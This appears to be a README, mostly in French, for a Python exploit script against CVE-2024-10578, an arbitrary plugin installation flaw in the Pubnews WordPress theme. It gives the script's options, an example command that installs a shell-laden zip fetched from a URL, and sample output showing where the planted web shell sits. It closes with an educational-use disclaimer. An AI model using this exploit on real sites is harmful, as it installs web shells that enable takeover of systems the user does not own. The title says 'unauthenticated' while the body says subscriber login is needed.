
Pubnews <= 1.0.7 - Installation non authentifiée de plugin arbitraire
Le thème Pubnews pour WordPress est vulnérable à l'installation non autorisée de plugins arbitraires en raison d'un manque de vérification des capacités dans la fonction pubnews_importer_plugin_action_for_notice() dans toutes les versions jusqu'à 1.0.7 incluse. Cette vulnérabilité permet aux attaquants authentifiés avec un accès de niveau Abonné ou supérieur d'installer des plugins arbitraires qui peuvent être utilisés pour exploiter d'autres vulnérabilités.
Ce script exploite la vulnérabilité du thème Pubnews pour installer un plugin arbitraire à partir d'une URL fournie. Le plugin peut contenir un shell malveillant ou toute autre charge utile.
CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL
Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi
options:
-h, --help show this help message and exit
-u, --url URL The URL of the WordPress site
-un, --username USERNAME
The username for WordPress login
-p, --password PASSWORD
The password for WordPress login
-url_zip, --plugin_url PLUGIN_URL
The plugin URL to install (must be a zip file with the shell injected inside)
python
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/
Ce script est destiné uniquement à des fins éducatives. L'auteur n'approuve pas l'utilisation de ce script pour des activités illégales. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test.
Par : Nxploited | Khaled Alenazi